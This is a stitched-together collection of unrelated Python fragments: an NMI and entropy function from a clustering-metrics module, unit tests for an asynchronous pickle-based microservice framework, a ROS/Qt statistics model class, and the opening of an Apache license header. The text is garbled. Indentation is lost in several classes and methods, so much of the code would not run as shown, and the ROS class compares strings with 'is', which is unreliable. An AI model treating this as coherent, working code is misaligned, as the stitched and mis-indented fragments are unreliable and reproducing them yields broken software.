    NMI scales the Mutual Information to [0, 1] (0 = no mutual
    information, 1 = perfect correlation) by dividing by
    ``sqrt(H(labels_true) * H(labels_pred))``. It is NOT adjusted for
    chance; :func:`adjusted_mutual_info_score` may be preferred. The score
    is independent of the absolute label values and symmetric in its two
    label arguments.

    Parameters
    ----------
    labels_true : int array, shape = [n_samples]
        A clustering of the data into disjoint subsets.
    labels_pred : array, shape = [n_samples]
        A clustering of the data into disjoint subsets.
    max_n_classes : int, optional (default=5000)
        Maximal number of classes handled; guards against MemoryError.

    Returns
    -------
    nmi : float
        Score between 0.0 and 1.0; 1.0 stands for a perfectly complete
        labeling.

    See also
    --------
    adjusted_rand_score: Adjusted Rand Index
    adjusted_mutual_info_score: Adjusted Mutual Information (adjusted
        against chance)
    """
    labels_true, labels_pred = check_clusterings(labels_true, labels_pred)
    n_classes = np.unique(labels_true).shape[0]
    n_clusters = np.unique(labels_pred).shape[0]

    # Special limit cases: no clustering since the data is not split
    # (single class/cluster, or empty input) — a perfect match.
    if n_classes == n_clusters and n_clusters in (0, 1):
        return 1.0

    contingency = contingency_matrix(labels_true, labels_pred,
                                     max_n_classes=max_n_classes)
    contingency = np.array(contingency, dtype='float')

    mi = mutual_info_score(labels_true, labels_pred, contingency=contingency)
    h_true, h_pred = entropy(labels_true), entropy(labels_pred)
    # Tiny floor on the normalizer guards against division by zero.
    return mi / max(np.sqrt(h_true * h_pred), 1e-10)
def entropy(labels):
    """Calculate the entropy (in nats) of a labeling.

    Returns 1.0 for an empty labeling — the limit-case convention relied on
    by homogeneity_completeness_v_measure.

    Fixed: ``float`` replaces the ``np.float`` alias, which is removed in
    NumPy >= 1.24 (AttributeError); ``np.bincount`` replaces the
    ``utils.fixes.bincount`` backport, which exists only to provide
    ``np.bincount`` semantics on very old NumPy. Both are behavior-identical.
    """
    if len(labels) == 0:
        return 1.0
    label_idx = np.unique(labels, return_inverse=True)[1]
    pi = np.bincount(label_idx).astype(float)
    pi = pi[pi > 0]
    pi_sum = np.sum(pi)
    # log(a / b) is computed as log(a) - log(b) to limit precision loss
    return -np.sum((pi / pi_sum) * (np.log(pi) - log(pi_sum)))
| |
import pickle
import time
from microservice.tests.microservice_test_case import MicroserviceTestCase
from unittest.mock import call
from microservice.core import settings, communication
from microservice.tests import microservices_for_testing
class TestAsynchronousLocalService(MicroserviceTestCase):
# Timer to allow the async threads to complete before we check their results.
# It would be better to actually wait for the threads to complete, but this is far simpler.
THREAD_TIMER = 0.1
@classmethod
def setUpClass(cls):
    """Configure global microservice settings once for the whole class.

    Selects ACTOR communication mode and KUBERNETES deployment mode, and
    clears the local URI, before any test in this class runs.
    """
    super(TestAsynchronousLocalService, cls).setUpClass()
    settings.communication_mode = settings.CommunicationMode.ACTOR
    settings.deployment_mode = settings.DeploymentMode.KUBERNETES
    settings.local_uri = None
    # Sample positional and keyword arguments shared by every test below.
    cls.args = (1, 2, 3)
    cls.kwargs = {'a': 'asdf', 'b': 123}
def test_request(self):
    """
    Test that:
      - A 200 response is received to making a request to a microservice
      - A separate request is made back to the calling service with the result.
    """
    local_service_name = 'microservice.tests.microservices_for_testing.echo_as_dict'
    self.mock_setup(local_service_name)
    # Build a message that already carries a result from another service,
    # then route it via this service with the shared sample args/kwargs.
    orig_msg = communication.Message()
    orig_msg.add_result('other_service_name', (), {}, [1, 3, 5, 7])
    test_msg = communication.construct_message_add_via(
        orig_msg,
        *self.args,
        **self.kwargs,
    )
    response = self.app.get(
        '/',
        data=test_msg.pickle,
        content_type='application/json')
    # The synchronous HTTP answer is just an acknowledgement (pickled True).
    result = pickle.loads(response.data)
    self.assertEqual(response.status_code, 200)
    self.assertEqual(result, True)
    # Wait for the thread pool to complete the work.
    time.sleep(self.THREAD_TIMER)
    # The async callback must carry the pre-existing result plus the new
    # result from this service (echo_as_dict's dict of args/kwargs).
    expected_message = communication.Message()
    expected_message.add_result('other_service_name', (), {}, [1, 3, 5, 7])
    expected_message.add_result(local_service_name, self.args, self.kwargs, {
        '_args': tuple(self.args),
        **self.kwargs
    })
    self.mocked_send_object_to_service.assert_has_calls([
        call(local_service_name,
             expected_message),
    ])
def test_request_resulting_in_exception(self):
    """
    Test that:
      - A 200 response is received to making a request to a microservice
      - A separate request is made back to the calling service with the result, which is an exception
    """
    local_service_name = 'microservice.tests.microservices_for_testing.exception_raiser'
    self.mock_setup(local_service_name)
    test_msg = communication.construct_message_add_via(
        communication.Message(),
        *self.args,
        **self.kwargs,
    )
    response = self.app.get(
        '/',
        data=test_msg.pickle,
        content_type='application/json')
    # The synchronous HTTP answer is still a success acknowledgement even
    # though the service itself raises: the exception travels in the
    # async result message instead.
    result = pickle.loads(response.data)
    self.assertEqual(response.status_code, 200)
    self.assertEqual(result, True)
    # Wait for the thread pool to complete the work.
    time.sleep(self.THREAD_TIMER)
    # Python in-built comparison for exceptions doesn't work for different
    # instances, so have to compare the arguments directly.
    self.mocked_send_object_to_service.assert_called_once()
    # Check the service name is as expected
    self.assertEqual(local_service_name,
                     self.mocked_send_object_to_service.mock_calls[0][1][0])
    # Check that the details of the exception are as expected
    expected = RuntimeError("Called with: {}; {}".format(self.args, self.kwargs))
    result_message = self.mocked_send_object_to_service.mock_calls[0][1][1]
    actual = result_message.get_result(local_service_name, self.args, self.kwargs)
    self.assertEqual(type(expected), type(actual))
    self.assertEqual(expected.args, actual.args)
    def test_request_with_originating_args(self):
        """
        Test that:
        - The call back to the originating microservice contains the args and kwargs that that microservice was
          originally called with
        """
        local_service_name = 'microservice.tests.microservices_for_testing.echo_as_dict'
        self.mock_setup(local_service_name)
        # The args/kwargs the *originating* service was itself invoked with;
        # these must round-trip through the message back to the caller.
        previous_service_args = [1, 2, 6]
        previous_service_kwargs = {
            3: 6,
            'asdf': 'wryt'
        }
        test_msg = communication.construct_message_add_via(
            communication.Message(
                args=previous_service_args,
                kwargs=previous_service_kwargs,
            ),
            *self.args,
            **self.kwargs,
        )
        response = self.app.get(
            '/',
            data=test_msg.pickle,
            content_type='application/json')
        result = pickle.loads(response.data)
        self.assertEqual(response.status_code, 200)
        self.assertEqual(result, True)
        # Wait for the thread pool to complete the work.
        time.sleep(self.THREAD_TIMER)
        # The reply must carry the originating args/kwargs plus the new result.
        expected_message = communication.Message.from_dict({
            'args': previous_service_args,
            'kwargs': previous_service_kwargs,
        })
        expected_message.add_result(local_service_name, self.args, self.kwargs, {
            '_args': tuple(self.args),
            **self.kwargs
        })
        self.mocked_send_object_to_service.assert_has_calls([
            call(local_service_name,
                 expected_message),
        ])
    def test_nested_request(self):
        """
        Test that a request to a service which itself calls another service results in an
        outgoing call to the nested service whose message carries the accumulated `via` chain.
        """
        nested_service_name = "microservice.tests.microservices_for_testing.echo_as_dict"
        local_service_name = 'microservice.tests.microservices_for_testing.echo_as_dict2'
        self.mock_setup(local_service_name)
        previous_service_args = (1, 2, 6)
        previous_service_kwargs = {
            3: 6,
            'asdf': 'wryt'
        }
        test_msg = communication.construct_message_add_via(
            communication.Message(
                args=previous_service_args,
                kwargs=previous_service_kwargs,
            ),
            *self.args,
            **self.kwargs,
        )
        response = self.app.get(
            '/',
            data=test_msg.pickle,
            content_type='application/json')
        result = pickle.loads(response.data)
        self.assertEqual(response.status_code, 200)
        self.assertEqual(result, True)
        # Wait for the thread pool to complete the work.
        time.sleep(self.THREAD_TIMER)
        # The outgoing message's `via` records both hops (caller, then this service).
        expected_message = communication.Message.from_dict({
            'args': (5, 2, 5),
            'kwargs': {'asdf': 'asdrf'},
            'via': [
                (local_service_name,
                 previous_service_args,
                 previous_service_kwargs),
                ('microservice.tests.microservices_for_testing.echo_as_dict2',
                 self.args,
                 self.kwargs)
            ],
        })
        self.mocked_send_object_to_service.assert_has_calls([
            call(nested_service_name,
                 expected_message),
        ])
    def test_nested_call_is_not_made_if_already_calculated(self):
        """
        The nested service result should be stored in the `results` dict of the call back to the original
        actor, and that should be used to save calling into the nested service again.
        """
        local_service_name = 'microservice.tests.microservices_for_testing.echo_as_dict2'
        self.mock_setup(local_service_name)
        previous_service_args = [1, 2, 6]
        previous_service_kwargs = {
            3: 6,
            'asdf': 'wryt'
        }
        echo_as_dict_expected_result = {
            '_args': microservices_for_testing.echo_as_dict2_args,
            **microservices_for_testing.echo_as_dict2_kwargs
        }
        test_msg = communication.construct_message_add_via(
            communication.Message(
                args=previous_service_args,
                kwargs=previous_service_kwargs,
            ),
            *self.args,
            **self.kwargs,
        )
        # Pre-populate the nested service's result so the handler can reuse it
        # instead of issuing a second outgoing call.
        test_msg.add_result('microservice.tests.microservices_for_testing.echo_as_dict',
                            microservices_for_testing.echo_as_dict2_args,
                            microservices_for_testing.echo_as_dict2_kwargs,
                            echo_as_dict_expected_result)
        response = self.app.get(
            '/',
            data=test_msg.pickle,
            content_type='application/json')
        result = pickle.loads(response.data)
        self.assertEqual(response.status_code, 200)
        self.assertEqual(result, True)
        # Wait for the thread pool to complete the work.
        time.sleep(self.THREAD_TIMER)
        # The only outgoing call goes straight back to the caller, carrying
        # both the cached nested result and this service's own result.
        expected_message = communication.Message.from_dict({
            'args': previous_service_args,
            'kwargs': previous_service_kwargs,
        })
        expected_message.add_result('microservice.tests.microservices_for_testing.echo_as_dict',
                                    microservices_for_testing.echo_as_dict2_args,
                                    microservices_for_testing.echo_as_dict2_kwargs,
                                    echo_as_dict_expected_result)
        expected_message.add_result('microservice.tests.microservices_for_testing.echo_as_dict2',
                                    self.args,
                                    self.kwargs,
                                    (
                                        {
                                            '_args': self.args,
                                            **self.kwargs
                                        },
                                        echo_as_dict_expected_result,
                                    ))
        self.mocked_send_object_to_service.assert_has_calls([
            call(local_service_name,
                 expected_message),
        ])
    def test_interface_request(self):
        """
        Test that calling into a decorated function with only args/kwargs results in a call to the relevant
        microservice.
        """
        self.mock_setup('my_app', interface=True)
        args = (3, 4, 5)
        kwargs = {'erty': 5, 'asdf': 'asddfg'}
        expected_result = ("nonsense", 35)
        target_service_name = 'microservice.tests.microservices_for_testing.echo_as_dict'
        result_key = communication.create_result_key(target_service_name, args, kwargs)
        # Make the result for this request available to pretend that it's been carried out successfully.
        settings.set_interface_result(self.request_id, expected_result)
        result = microservices_for_testing.echo_as_dict(*args, **kwargs)
        # Make sure that we've flagged this request ID as being made
        self.assertIn(self.request_id, settings.interface_requests.keys())
        self.assertEqual(result_key, settings.interface_requests[self.request_id])
        self.assertEqual(result, expected_result)
        # The outgoing message must carry the interface's name in `via` and the request id.
        self.mocked_send_object_to_service.assert_has_calls([
            call(target_service_name,
                 communication.Message.from_dict({
                     'args': args,
                     'kwargs': kwargs,
                     'via': [('my_app', (), {})],
                     'request_id': self.request_id,
                 })),
        ])
    def test_interface_response(self):
        """
        This test covers the handling of a response to a request made from an interface.
        It relies on the results being handled (and cached) separately to the request being made. It does:
        - Set up the local microservice handler in interface mode.
        - Send the response to this local handler (flask app)
        - Ensure that response is stored correctly
        - Make a request that would wait for that response, but finishes immediately because it's already available.
        The reason for doing this back to front (response, then request) is to avoid complicating the test with
        threading (as the request blocks until the response is received).
        """
        self.mock_setup('my_app', interface=True)
        args = (3, 4, 5)
        kwargs = {'erty': 5, 'asdf': 'asddfg'}
        expected_result = ("nonsense", 35)
        target_service_name = 'microservice.tests.microservices_for_testing.echo_as_dict'
        result_key = communication.create_result_key(target_service_name, args, kwargs)
        # State that we're expecting a response for a request matching self.request_id
        settings.set_interface_request(self.request_id, result_key)
        # Construct the message that we'd expect to see back in response
        response_message = communication.Message(
            request_id=self.request_id,
        )
        response_message.add_result(target_service_name, args, kwargs, expected_result)
        # Send the response - the answer should get placed in the response storage.
        response = self.app.get(
            '/',
            data=response_message.pickle,
            content_type='application/json')
        response_result = pickle.loads(response.data)
        self.assertEqual(response_result, True)
        # Wait for the thread pool to complete the work.
        time.sleep(self.THREAD_TIMER)
        # Check that the result has been logged
        self.assertIn(self.request_id, settings.interface_results.keys())
        self.assertEqual(expected_result, settings.interface_results[self.request_id])
        # Make the request that this corresponds to, to check that the result is picked up correctly.
        result = microservices_for_testing.echo_as_dict(*args, **kwargs)
        self.assertEqual(result, expected_result)
        # Remove the hanging request id to tidy up for any other tests.
        # This is only required because we're doing this test in the reverse order (response, then request).
        del settings.interface_requests[self.request_id]
    def test_interface_response_resulting_in_exception(self):
        """
        This test is identical to the test `test_interface_response`, but the response is an exception, so we expect
        to see it raised instead of simply returned.
        """
        self.mock_setup('my_app', interface=True)
        args = (3, 4, 5)
        kwargs = {'erty': 5, 'asdf': 'asddfg'}
        # The stored "result" is itself an exception instance.
        expected_result = RuntimeError("Sample error that should get raised.")
        target_service_name = 'microservice.tests.microservices_for_testing.echo_as_dict'
        result_key = communication.create_result_key(target_service_name, args, kwargs)
        # State that we're expecting a response for a request matching self.request_id
        settings.set_interface_request(self.request_id, result_key)
        # Construct the message that we'd expect to see back in response
        response_message = communication.Message(
            request_id=self.request_id,
        )
        response_message.add_result(target_service_name, args, kwargs, expected_result)
        # Send the response - the answer should get placed in the response storage.
        response = self.app.get(
            '/',
            data=response_message.pickle,
            content_type='application/json')
        response_result = pickle.loads(response.data)
        self.assertEqual(response_result, True)
        # Wait for the thread pool to complete the work.
        time.sleep(self.THREAD_TIMER)
        # Make the request that this corresponds to, to check that the result is picked up correctly.
        with self.assertRaises(type(expected_result)):
            microservices_for_testing.echo_as_dict(*args, **kwargs)
        # Remove the hanging request id to tidy up for any other tests.
        # This is only required because we're doing this test in the reverse order (response, then request).
        del settings.interface_requests[self.request_id]
| |
from threading import Lock
import time as tm
from rospy.rostime import Duration, Time
import rospy
from python_qt_binding.QtCore import QTranslator, QObject
from helper_functions import prepare_number_for_representation, topic_statistics_state_to_string, \
ALIVE_TIMER_CALLBACK, MAXIMUM_OFFLINE_TIME, WARNING_TIMEOUT
class AbstractItem(QObject):
"""
Provides a unified interface to access the items of the model.
INTERNAL: WARNING! Whenever the key-values at the beginning are not set right, the oddest things may occur!
"""
    def __init__(self, logger, seuid, parent=None):
        """
        Initializes the AbstractItem.

        :param logger: a logger where to log when special events occur
        :type logger: ModelLogger
        :param seuid: the seuid of the AbstractItem
        :type seuid: str
        :param parent: the parent-item
        :type parent: AbstractItem
        """
        super(AbstractItem, self).__init__(parent)
        self._logger = logger
        # raw statistics samples, keyed by attribute name -> list of values
        self._data = {}
        self.counter = 0
        """
        _rated_data is dict containing the rated data. state, window_start and window_end are simply lists
        with the corresponding entries. Any other values typically is a list containing lists which however contain the
        values. This is equivalent to the representation in the RatedStatistics/Entity.
        """
        self._rated_data = {}
        self._child_items = []
        self.__parent = parent
        self.seuid = seuid
        # overwritten by subclasses with a meaningful type string
        self._type = "type"
        self.__data_attribute = "data"
        # history of rated states (newest last); read via get_state()
        self.__state = []
        # self.__last_update = Time.now()
        self.__creation_time = Time.now()
        self.marked = False
        # self.markation_date = Time.now()
        # both data stores always track their rating windows
        self._add_data_list("window_start")
        self._add_data_list("window_stop")
        self._add_rated_data_list("window_start")
        self._add_rated_data_list("window_stop")
        self._length_of_data = 0
        self._length_of_rated_data = 0
        # guard _data / _rated_data against concurrent access
        self._data_lock = Lock()
        self._rated_data_lock = Lock()
        self._rated_attributes = []
        self._rated_attributes.append("alive.actual_value")
        self._rated_attributes.append("alive.expected_value")
        self._rated_attributes.append("alive.state")
        #self._alive_timer = rospy.Time.now()
        #self.alive = True
        #rospy.Timer(rospy.Duration(ALIVE_TIMER_CALLBACK), self._updateTimer)
        #self._offline_time = rospy.Duration(MAXIMUM_OFFLINE_TIME)
        self.is_subscriber = False
# def _updateTimer(self, event):
# """
# Updates the timer to the last changed status. If it
# :return:
# """
# #self._alive_timer = self.get_latest_data("window_stop")["window_stop"]
# if (Time.now() - self._alive_timer) > self._offline_time:
# print(self.seuid)
# print(Time.now() - self._alive_timer)
# print(self._offline_time)
# self.alive = False
# self.set_state("no recent data")
# else:
# self.alive = True
def get_type(self):
"""
Returns the type of the item
:return: the type
:rtype: str
"""
return self._type
def get_seuid(self):
"""
Returns the seuid as a string.
:returns: seuid of the item
:rtype: str
"""
return self.seuid
def add_state(self, state):
"""
Used to simply add a state to the list of states.
"""
self.__state.append(state)
def set_state(self, state):
if len(self.__state) is not 0:
self.__state[-1] = state
else:
self.__state.append(state)
def get_state(self):
"""
Returns the state as a string.
:returns: state of the item
:rtype: str
"""
if self.__state:
return self.__state[-1]
return "unknown"
def _add_data_list(self, name):
"""
Adds keys to the data_list.
:param name: the key to be added
:type name: str
"""
self._data[name] = []
def _add_rated_data_list(self, name):
"""
Adds keys to the rated_data_list.
:param name: the key to be added
:type name: str
"""
self._rated_data[name] = []
def append_child(self, child):
"""
Append a child to the list of childs.
:param child: the child item
:type child: AbstractItem
"""
self._child_items.append(child)
def _update_current_state(self):
"""
This method updates the current state of the AbstractItem.
:raises TypeError: at the initialization, it's possible that last_states["state"] has no entries and a TypeError occures
"""
if self.get_state():
if self.get_state() is not "error":
last_states = self.get_rated_items_younger_than(Time.now() - (
Duration(secs=WARNING_TIMEOUT) if int(Duration(secs=5).to_sec()) <= int(Time.now().to_sec()) else Time(0)),
"state")
try:
for i in range(0, len(last_states["state"])):
if last_states["state"][i] is "error":
self.set_state("warning")
break
except TypeError:
return
def append_data(self, message):
"""
Appends data to the data of the AbstractItem.
:param message: the message to append
:type message: one of the different message types TopicStatistics, HostStatistics or NodeStatistics
:raises KeyError: if an entry is in the rated dictionary but not found in the message
"""
self._data_lock.acquire()
#self._alive_timer = rospy.Time.now()
for attribute in self._data:
try:
if attribute is "frequency":
self._data[attribute].append(message.delivered_msgs / (message.window_stop - message.window_start).to_sec())
elif attribute is "bandwidth":
self._data[attribute].append(message.traffic / (message.window_stop - message.window_start).to_sec())
else:
self._data[attribute].append(getattr(message, attribute))
except KeyError:
print("KeyError occurred when trying to access %s", attribute)
raise
self._length_of_data += 1
self._data_lock.release()
def update_rated_data(self, data):
"""
Appends data to the rated_data of the AbstractItem.
:param data: the data to append in key value form
:type data: RatedStatistics
:raises KeyError: if an entry is in the rated dictionary but not found in the message
"""
self._rated_data_lock.acquire()
self._rated_data["window_start"].append(data.window_start)
self._rated_data["window_stop"].append(data.window_stop)
last_state = self.get_state()
new_state = "unknown"
for element in data.rated_statistics_entity:
self._rated_data[element.statistic_type + ".actual_value"].append(element.actual_value)
self._rated_data[element.statistic_type + ".expected_value"].append(element.expected_value)
for i in range(0, len(element.state)):
state = topic_statistics_state_to_string(element, element.state[i])
self._rated_data[element.statistic_type + ".state"].append(state)
if (state is "low" or state is "high") and state is not "ok" and state is not "unkown":
new_state = "error"
elif state is "ok" and new_state is not "error":
new_state = "ok"
self.add_state(new_state)
self._update_current_state()
if new_state is "error" and last_state is not "error":
self._logger.log("error", Time.now(), self.seuid, self.get_erroneous_entries_for_log())
self._rated_data_lock.release()
def child_count(self, parent=None):
"""
Returns the number of children from the AbstractItem.
:returns: number of childs
:rtype: int
"""
return len(self._child_items)
def column_count(self):
"""
Returns the number of columns.
:returns: the number of columns
:rtype: int
"""
return 4
def get_childs(self, parent=None):
"""
Returns a list with all children.
:returns: list of children
:rtype: list
"""
return self._child_items
def get_child(self, row, parent=None):
"""
Returns the child at the position row.
:param row: the index of the row
:type row: int
:returns: the child at the position row
:rtype: AbstractItem
"""
return self._child_items[row]
def row(self, parent=None):
"""
Returns the index of the Item.
:returns: the index of the Item
:rtype: int
"""
if self.__parent:
return self.__parent.get_childs().index(self)
return 0
def get_amount_of_entries(self):
"""
Returns the amount of entries in the data part of the item
:return: amount of entries
:rtype: int
"""
return self._length_of_data
def get_latest_data(self, *args):
"""
Returns the latest dict of the data_list or the item of the dict with the given key.
:param kwargs: the keys to the dict
:type kwargs: str
:returns: dict of the item
:rtype: dict
:raises KeyError: if an element in args cannot be found in any of the dictionaries (data vs rated data) or attributes (namely name, type, data and state)
"""
self._data_lock.acquire()
return_dict = {}
if args:
for key in args:
if key is 'name':
return_dict['name'] = self.seuid
elif key is 'type':
return_dict['type'] = self._type
# elif key is 'data':
# return_dict['data'] = self.get_short_data()
elif key is 'state':
if len(self.__state) is not 0:
return_dict['state'] = self.get_state()
else:
return_dict["state"] = "unknown"
else:
if key in self._data:
if self._data[key]:
return_dict[key] = self._data[key][-1]
else:
if key == 'window_stop':
return_dict[key] = Time(0)
elif key in self.get_list_items():
return_dict[key] = [self.tr("Currently no value available")]
else:
return_dict[key] = self.tr("Currently no value available")
elif key in self._rated_data:
if self._rated_data[key]:
return_dict[key] = self._rated_data[key][-1]
else:
return_dict[key] = self.tr("Currently no value available")
# raise KeyError("item " + key + "was not found")
else:
return_dict['name'] = self.seuid
return_dict['type'] = self._type
# return_dict['data'] = self.get_short_data()
for entry in self._data:
if self._data[entry]:
return_dict[entry] = self._data[entry][-1]
else:
if entry == 'window_stop':
return_dict[entry] = Time(0)
elif entry in self.get_list_items():
return_dict[entry] = [self.tr("Currently no value available")]
else:
return_dict[entry] = self.tr("Currently no value available")
for entry in self._rated_data:
if entry == 'window_start' or entry == 'window_stop':
continue
if self._rated_data[entry]:
return_dict[entry] = self._rated_data[entry][-1]
else:
return_dict[entry] = self.tr("Currently no value available")
if len(self.__state) is not 0:
return_dict['state'] = self.get_state()
else:
return_dict['state'] = "unknown"
self._data_lock.release()
return return_dict
def parent(self):
"""
Returns the parent of this or None if there is no parent.
:returns: parent
:rtype: AbstractItem
"""
return self.__parent
def get_items_older_than(self, time):
"""
Returns all items which are older than time.
Warning: Method assumes data is sorted by time if this is not true will return too few or too much data.
WARNING: This method is only thread-safe if used via delete_items_older_than() otherwise the
method may result in undetermined behaviour.
:param time: the upper bound in seconds
:type time: rospy.Time
:returns: dict of lists with the data
:rtype: dict
"""
return_values = {}
breakpoint = 0
list_of_time = self._data["window_stop"]
return_values["window_stop"] = []
length = len(list_of_time)
if length is not 0:
if list_of_time[-1] < time:
for key in return_values:
return_values[key] = self._data[key]
else:
i = length - 1
while i > 0 and list_of_time[i] > time:
i -= 1
breakpoint = i
for key in self._data:
return_values[key] = self._data[key][0:breakpoint]
# todo: currently this is not right for rated data... FIX!!! --> probably move this to another function!
return_values["state"] = self.__state[breakpoint:length]
# self._data_lock.release()
return return_values
def delete_items_older_than(self, time):
"""
Deletes all items which are older than time.
:param time: the upper bound
:type time: rospy.Time
"""
self._data_lock.acquire()
self._rated_data_lock.acquire()
list_of_time = self._data["window_stop"]
if len(list_of_time) is not 0:
i = 0
entries_to_delete = self.get_items_older_than(time)
i += len(entries_to_delete["window_stop"])
for j in range(0, len(entries_to_delete["window_stop"])):
for value in self._data.values():
del value[0]
self._length_of_data -= i
self.delete_rated_items_older_than(time)
self._rated_data_lock.release()
self._data_lock.release()
def get_rated_items_older_than(self, time):
"""
Returns all items which are older than time.
Warning: Method assumes data is sorted by time if this is not true will return too few or too much data.
WARNING: This method is only thread-safe if used via delete_items_older_than() otherwise the
method may result in undetermined behaviour.
:param time: the upper bound in seconds
:type time: rospy.Time
:returns: dict of lists with the data
:rtype: dict
"""
return_values = {}
breakpoint = 0
list_of_time = self._rated_data["window_stop"]
return_values["window_stop"] = []
length = len(list_of_time)
if length is not 0:
if list_of_time[-1] < time:
for key in return_values:
return_values[key] = self._rated_data[key]
else:
i = length - 1
while i > 0 and list_of_time[i] > time:
i -= 1
breakpoint = i
for key in self._rated_data:
return_values[key] = self._rated_data[key][0:breakpoint]
return_values["state"] = self.__state[breakpoint:length]
return return_values
def delete_rated_items_older_than(self, time):
"""
Deletes all items which are older than time.
:param time: the upper bound
:type time: rospy.Time
:raises IndexError: Because in most cases not all values are monitored, it is possible that a reated_data_value is empty
"""
list_of_time = self._rated_data["window_stop"]
if len(list_of_time) is not 0:
i = 0
entries_to_delete = self.get_rated_items_older_than(time)
i += len(entries_to_delete["window_stop"])
for j in range(0, len(entries_to_delete["window_stop"])):
for value in self._rated_data.values():
try:
del value[0]
except IndexError:
j += 1
self._length_of_rated_data -= i
def get_items_younger_than(self, time, *args):
"""
Returns all entries that are younger than time either in all keys of self._data or if args not empty in
all key corresponding to args.
Warning: Method assumes data is sorted by time if this is not true will return too few or too much data.
:param time: the lower bound in seconds
:type time: rospy.Time
:param args: the keys to the dict
:type args: str
:returns: dict of lists
:rtype: dict
:raises KeyError: if an element in args cannot be found in any of the dictionaries (data vs rated data)
"""
self._data_lock.acquire()
return_values = {}
if args:
for key in args:
return_values[key] = None
if "window_stop" not in args:
return_values["window_stop"] = None
else:
return_values["window_stop"] = None
for key in self._data:
return_values[key] = None
breakpoint = 0
list_of_time = self._data["window_stop"]
length = len(list_of_time)
if length is not 0:
if list_of_time[0] >= time:
for key in return_values:
try:
return_values[key] = self._data[key][:]
except KeyError:
print("Accessed key was: " + key + ". Available keys are: ")
print(self._data)
raise
else:
for i in range(length - 1, -1, -1):
if list_of_time[i] < time:
breakpoint = i + 1
for key in return_values:
if key in self._data:
return_values[key] = self._data[key][breakpoint:length]
else:
raise IndexError("IndexError! length of the list %s, accessed index %s. length of data"
" at given point %s, key is %s", length, i, len(self._data[key]), key)
break
self._data_lock.release()
return return_values
def get_rated_items_younger_than(self, time, *args):
"""
Returns all entries that are younger than time either in all keys of self._rated_data or if args not empty in
all key corresponding to args.
Warning: Method assumes data is sorted by time if this is not true will return too few or too much data.
:param time: the lower bound in seconds
:type time: rospy.Time
:param args: the keys to the dict
:type args: str
:returns: dict of lists
:rtype: dict
:raises KeyError: if an element in args cannot be found in any of the dictionaries (data vs rated data)
"""
return_values = {}
if args:
for key in args:
return_values[key] = None
if "window_stop" not in args:
return_values["window_stop"] = None
else:
for key in self._rated_data:
return_values[key] = None
return_values["state"] = None
breakpoint = 0
list_of_time = self._rated_data["window_stop"]
length = len(list_of_time)
if length is not 0:
if list_of_time[0] >= time:
for key in return_values:
if key is 'state':
return_values[key] = self.__state
else:
try:
return_values[key] = self._rated_data[key]
except KeyError:
print("Accessed key was: " + key + ". Available keys are: ")
print(self._rated_data)
raise
else:
for i in range(length - 1, -1, -1):
if list_of_time[i] < time:
breakpoint = i + 1
for key in return_values:
if key in self._rated_data:
return_values[key] = self._rated_data[key][breakpoint:length]
elif key is "state":
return_values[key] = self.__state[breakpoint:length]
else:
raise IndexError("IndexError! length of the list %s, accessed index %s. length of data"
" at given point %s, key is %s", length, i, len(self._data[key]), key)
break
return return_values
    def execute_action(self, action):
        """
        Executes a action on the current item like stop or restart. Calls to this method should be redirected to the remote host on executed there.

        :param action: the action which should be executed
        :type action: RemoteAction
        """
        # Base implementation is a no-op; subclasses supporting actions override it.
        pass
    def get_detailed_data(self):
        """
        Returns detailed description of current state as html text. Has to be implemented in subclasses.

        :returns: detailed data
        :return: str
        :raises NotImplementedError: always; subclasses must override this method
        """
        raise NotImplementedError()
    def get_plotable_items(self):
        """
        Returns the plotable entries in the item. Has to be implemented in subclasses.

        :return: list of the items(str)
        :rtype: list
        :raises NotImplementedError: always; subclasses must override this method
        """
        raise NotImplementedError()
def get_erroneous_entries(self):
"""
Returns the erroneous entries as a html string
:returns: an html string containing the erroneous entries yet preformatted
:rtype: str
"""
self._data_lock.acquire()
content = "<p class=\"get_erroneous_entries\">"
return_values = {}
if self.__state:
if self.get_state() is not "ok" and self.get_state() is not "unknown":
if self._rated_data["alive.state"]:
if self._rated_data["alive.state"][-1] is "high" or self._rated_data["alive.state"][-1] is "low":
content += self.tr("alive actual_value:") + \
" <span class=\"erroneous_entry\">" + prepare_number_for_representation(
self._rated_data["alive.actual_value"][-1][0]) + "</span>" + \
"<br>"
content += self.tr("alive expected_value:") + \
" <span class=\"erroneous_entry\">" + str(
self._rated_data["alive.expected_value"][-1][0]) + "</span>" + \
"<br>"
content += self.tr("alive state:") + \
" <span class=\"erroneous_entry\">" + str(
self._rated_data["alive.state"][-1]) + "</span>" + "<br>"
for entry in self._attributes:
if self._rated_data[entry + ".state"]:
if self._rated_data[entry + ".state"][-1] is "high" or self._rated_data[entry + ".state"][
-1] is "low":
content += self.tr(entry) + \
self.tr(" actual_value:") + \
" <span class=\"erroneous_entry\">" + prepare_number_for_representation(
self._rated_data[entry + ".actual_value"][-1][0]) + "</span> " + \
self.tr(entry + "_unit") + "<br>"
content += self.tr(entry) + \
self.tr(" expected_value:") + \
" <span class=\"erroneous_entry\">" + str(
self._rated_data[entry + ".expected_value"][-1][0]) + "</span> " + \
self.tr(entry + "_unit") + "<br>"
content += self.tr(entry) + \
self.tr(" state:") + \
" <span class=\"erroneous_entry\">" + str(
self._rated_data[entry + ".state"][-1]) + "</span>" + "<br>"
content += "<br>"
content += "</p>"
self._data_lock.release()
return content
def can_execute_actions(self):
"""
This item cannot execute actions
:return: False
"""
return False
def get_short_data(self):
return self.get_erroneous_entries_for_log()
def get_erroneous_entries_for_log(self):
"""
Returns the erroneous entries for the log as a string
:returns: an string containing the erroneous entries yet preformatted
:rtype: str
"""
self._data_lock.acquire()
content = ""
if len(self._rated_data["window_stop"]) != 0:
if self.get_state() is not "ok" and self.get_state() is not "unknown":
if self._rated_data["alive.state"][-1] == "high" or self._rated_data["alive.state"][-1] == "low":
content += self.tr("alive") + ": " + str(self._rated_data["alive.actual_value"][-1][-1]) + ", "
for entry in self._attributes:
if self._rated_data[entry + ".state"]:
if self._rated_data[entry + ".state"][-1] == "high" or self._rated_data[entry + ".state"][-1] is "low":
content += self.tr(entry) + ": " + str(self._rated_data[entry + ".state"][-1]) + ", "
else:
return "Not sufficient rated data yet"
self._data_lock.release()
return content
| |
#!/usr/bin/python2.4
#
# Copyright 2009 Empeeric LTD. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
